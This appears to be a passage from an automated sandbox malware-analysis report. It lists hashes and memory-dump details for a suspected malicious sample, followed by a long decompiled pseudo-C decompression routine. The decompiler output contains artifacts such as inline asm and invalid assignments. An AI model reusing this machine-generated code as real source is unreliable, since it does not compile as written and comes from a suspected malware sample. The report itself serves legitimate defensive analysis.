                                                                            • Instruction ID: f7806d61ed32c72e1961e2af6bd7648733caaa80972945f4ecce55c4e6c49de9
                                                                            • Opcode Fuzzy Hash: ed2963ef7ac6d3e446b1c72a177f6b842a297acf441d34ccae2e1542e5ed2e0c
                                                                            • Instruction Fuzzy Hash: 3031D535600A98CFEF748E3A9F697DE37B39F92340F95842ACC4A4B155D7308256CB02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAEC6A Relevance: .3, Instructions: 335COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bc1de6d3603416c443ecccfa95a370c63bce51895b257daf1471da891048536
                                                                            • Instruction ID: d1b7ad49d54b2c0a1df1a73c9f6c9a202ec01b539232c6c0ab89a04dcd8b7e8c
                                                                            • Opcode Fuzzy Hash: 0bc1de6d3603416c443ecccfa95a370c63bce51895b257daf1471da891048536
                                                                            • Instruction Fuzzy Hash: 0CC18772A043499FCB388E38CD987EB7BB6AF58310F95452EDC89DB205D7319985CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406D85 Relevance: .3, Instructions: 334COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 79%
                                                                            			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							L004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L183;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L181:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L181;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L181;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L181;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L181;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L181;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L184;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L173:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L164:
												__esi[0x26ea] = __edi;
												__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L184;
												} else {
													goto L173;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if (__eax == __edx) goto L164;
											asm("adc ecx, [ebx+0x73f83bfa]");
										case 7:
											L174:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L176;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L183;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L181;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L181;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													do {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														L20:
														 *_t416 = _t438;
														_t416 = _t416 + 4;
														__eflags = _t416 - 0x432190;
													} while (_t416 < 0x432190);
													E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
													_push(0x1e);
													_pop(_t440);
													_push(5);
													_pop(_t419);
													memset(0x431d10, _t419, _t440 << 2);
													_t450 = _t450 + 0xc;
													_t442 = 0x431d10 + _t440;
													E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
													 *0x432e90 =  *0x432e90 + 1;
													__eflags =  *0x432e90;
													goto L22;
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L181;
											}
											L8:
											if(_t423 != 1) {
												goto L181;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L183;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L181;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L184;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L183;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L183;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
